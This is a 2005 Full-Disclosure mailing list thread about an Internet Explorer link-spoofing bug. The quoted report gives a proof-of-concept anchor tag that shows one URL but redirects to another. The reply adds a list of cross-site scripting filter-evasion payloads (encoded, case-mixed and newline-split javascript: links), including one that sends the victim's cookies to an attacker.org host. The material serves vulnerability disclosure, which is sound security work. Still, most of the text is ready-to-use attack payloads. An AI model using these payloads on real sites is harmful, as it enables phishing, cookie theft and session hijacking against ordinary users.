Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen).

[Jerome Athias <jerome.athias () free fr>]

You can then mix it with some classical XSS tricks like

Basic XSS test detected:

<a href="javascript:alert('XSS')" title="http://www.google.com";>hello0</a>
<a
href="http://www.target.com/foo<script>document.location='http://www.attacker.org/?&apos;
+document.cookies</script>">Click here</a>


Basic XSS test :

<a href="JaVaScRiPt:alert('XSS')" title="http://www.google.com";>hello0</a>

UTF-8:

<a
href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41"
title="http://www.google.com";>hello</a>

Long UTF-8 Unicode encoding without semicolons:

<a
href=&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041
title="http://www.google.com";
onMouseOver="pop('http://www.google.com&apos;);" onmouseout="kill()">hello</a>

Embedded newline to break up XSS:

<a href=jav&#x0A;ascript:alert('XSS'); title="http://www.google.com";
hover="http://www.google.com";>hello2</a>

Embedded carriage return to break up XSS (doesn't appear as link):

<a href=jav&#x0D;ascript:alert('XSS'); title="http://www.google.com";
onmouseover="image(this.href);">hello3</a>

Inserting spaces in href link:

<a href=" javascript:alert('XSS');" title="http://www.google.com";>hello4</a>


etc...

some bypass the Opera anti-illegal-urls

K-Gen Gen wrote:

> New (19.10.05) MS-IE Url Spoofing bug (by K-Gen).
>
> Gr337s .. I (K-Gen) have found a new (I think..) URL spoofing bug in IE.
>
> Affected : All MS-IE Browsers (Win XP SP2 as well).
>
> This allows a malicious website to host a specially crafted A HREF tag
> that shows to the user
> as a link to one location, but actually redirects to another. This can
> be used in Phishing scams
> and other malicious attacks.
>
> The basic idea here is to write a geniune <a href=""> </a>tag but
> include an onClick event handeler
> that will redirect (window.location="";) to another page. The next
> example won't work:
>
> <a href="http://microsoft.com";
> onClick="window.location='http://google.com';";>Microsoft</a>
>
> Probably there is some protection in IE .. but not enough :)
>
> If we try the next thing:
>
> <a href="http://microsoft.com"; onClick="alert()">Microsoft</a>
>
> An alert WILL pop-up before redirecting. The same thing will happen to
> the document.write("");
> method, it will execute before redirection.
>
> Hence, the next Proof of Concept:
>
> <a href="http://microsoft.com";
> onClick="document.write(unescape('%3cscript%3ewindow.location=%27http://google.com%27%3c/script%3e&apos;))">Microsoft</a>
>
> Put the code into an HTML page and see for yourself. In the status bar
> and in the properties the
> link appears as http://microsoft.com , but if you click on the link it
> will redirect you to
> http://google.com .
>
> I used unescape becuse characters like < > and ' cause run-time errors...
>
> This is not extremely critical as the old %01@ bug (That still works
> on my IE sp1 :lol:), becuase
> It does not obscure the real link in the Address bar, but i bet there
> will be a PoC for this one too, sooner or later...
>
> Have a Nice Day.
> K-Gen
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/